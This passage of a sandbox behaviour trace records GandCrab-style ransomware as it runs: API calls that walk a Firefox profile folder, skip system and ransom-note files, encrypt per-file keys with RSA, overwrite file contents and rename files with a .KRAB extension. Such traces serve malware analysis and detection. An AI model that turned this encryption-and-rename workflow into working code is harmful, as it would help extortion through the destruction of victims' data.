pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0084.667] GetLastError () returned 0x0 [0084.667] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0084.667] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0084.667] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010930) returned 1 [0084.669] CryptImportKey (in: hProv=0x1010930, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0084.669] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0084.669] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0084.669] GetLastError () returned 0x0 [0084.669] CryptDestroyKey (hKey=0x10235f8) returned 1 [0084.669] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0084.669] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0084.684] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0084.685] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0084.685] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x1d, lpOverlapped=0x0) returned 1 [0084.737] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.739] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x1d, lpOverlapped=0x0) returned 1 [0084.740] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0084.740] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.745] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.745] CloseHandle (hObject=0x7ec) returned 1 [0084.745] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.749] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\times.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\times.json.krab")) returned 1 [0084.750] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.750] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0084.750] lstrcmpW (lpString1="webappsstore.sqlite", lpString2=".") returned 1 [0084.750] lstrcmpW (lpString1="webappsstore.sqlite", lpString2="..") returned 1 [0084.750] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="webappsstore.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite" [0084.750] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.751] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite.KRAB") returned 104 [0084.751] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0084.751] lstrlenW (lpString=".sqlite") returned 7 [0084.751] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.751] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0084.751] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.751] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0084.751] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0084.751] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="desktop.ini") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="autorun.inf") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntuser.dat") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="iconcache.db") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="bootsect.bak") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="boot.ini") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntuser.dat.log") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="thumbs.db") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntldr") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="NTDETECT.COM") returned 1 [0084.752] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Bootfont.bin") returned 1 [0084.752] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.753] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10110a0) returned 1 [0084.757] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.757] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.757] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.758] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0084.758] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0084.758] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.761] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010b50) returned 1 [0084.762] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.763] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.763] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.763] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0084.763] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0084.763] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.765] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010a40) returned 1 [0084.768] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023338) returned 1 [0084.768] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0084.768] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0084.769] GetLastError () returned 0x0 [0084.769] CryptDestroyKey (hKey=0x1023338) returned 1 [0084.769] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0084.769] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011678) returned 1 [0084.770] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0084.771] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0084.771] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0084.771] GetLastError () returned 0x0 [0084.771] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0084.771] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0084.771] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0084.774] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0084.775] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0084.775] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x18000, lpOverlapped=0x0) returned 1 [0084.996] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffe8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.996] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x18000, lpOverlapped=0x0) returned 1 [0084.997] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0084.997] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.001] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.001] CloseHandle (hObject=0x7ec) returned 1 [0085.002] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.002] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\webappsstore.sqlite.krab")) returned 1 [0085.003] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.003] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0085.003] lstrcmpW (lpString1="xulstore.json", lpString2=".") returned 1 [0085.003] lstrcmpW (lpString1="xulstore.json", lpString2="..") returned 1 [0085.003] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="xulstore.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json" [0085.003] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.004] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json.KRAB") returned 98 [0085.004] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.004] lstrlenW (lpString=".json") returned 5 [0085.004] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.004] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".json ") returned 6 [0085.004] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.004] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.004] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="desktop.ini") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="autorun.inf") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="ntuser.dat") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="iconcache.db") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="bootsect.bak") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="boot.ini") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="ntuser.dat.log") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="thumbs.db") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="KRAB-DECRYPT.html") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="ntldr") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="NTDETECT.COM") returned 1 [0085.005] lstrcmpiW (lpString1="xulstore.json", lpString2="Bootfont.bin") returned 1 [0085.005] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.005] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011238) returned 1 [0085.007] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.007] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.008] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.008] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0085.008] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0085.008] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.008] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010a40) returned 1 [0085.010] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.010] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.010] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.010] CryptGenRandom (in: hProv=0x1010a40, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0085.010] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0085.010] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.011] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10113d0) returned 1 [0085.014] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0085.014] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0085.014] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0085.014] GetLastError () returned 0x0 [0085.014] CryptDestroyKey (hKey=0x10235f8) returned 1 [0085.015] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0085.015] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010b50) returned 1 [0085.016] CryptImportKey (in: hProv=0x1010b50, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0085.016] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0085.016] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0085.017] GetLastError () returned 0x0 [0085.017] CryptDestroyKey (hKey=0x10231f8) returned 1 [0085.017] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0085.017] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\xulstore.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0085.017] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.018] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.018] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x333, lpOverlapped=0x0) returned 1 [0085.054] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.055] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x333, lpOverlapped=0x0) returned 1 [0085.055] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0085.055] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.059] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.059] CloseHandle (hObject=0x7ec) returned 1 [0085.059] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.060] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\xulstore.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\xulstore.json.krab")) returned 1 [0085.061] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.061] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0085.061] FindClose (in: hFindFile=0x10230f8 | out: hFindFile=0x10230f8) returned 1 [0085.063] CloseHandle (hObject=0x774) returned 1 [0085.063] FindNextFileW (in: hFindFile=0x1023138, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0085.063] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0085.063] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0085.063] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a08d2ca4dee3d.lock" [0085.063] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.063] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 91 [0085.063] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a08d2ca4dee3d.lock") returned 86 [0085.063] lstrlenW (lpString=".lock") returned 5 [0085.063] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.064] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0085.064] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.064] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.064] FindNextFileW (in: hFindFile=0x1023138, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0085.064] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.065] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\KRAB-DECRYPT.txt" [0085.065] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.065] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\KRAB-DECRYPT.txt.KRAB") returned 84 [0085.065] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\KRAB-DECRYPT.txt") returned 79 [0085.065] lstrlenW (lpString=".txt") returned 4 [0085.065] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.065] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.066] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\KRAB-DECRYPT.txt") returned 79 [0085.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\KRAB-DECRYPT.txt") returned 79 [0085.066] lstrcmpiW 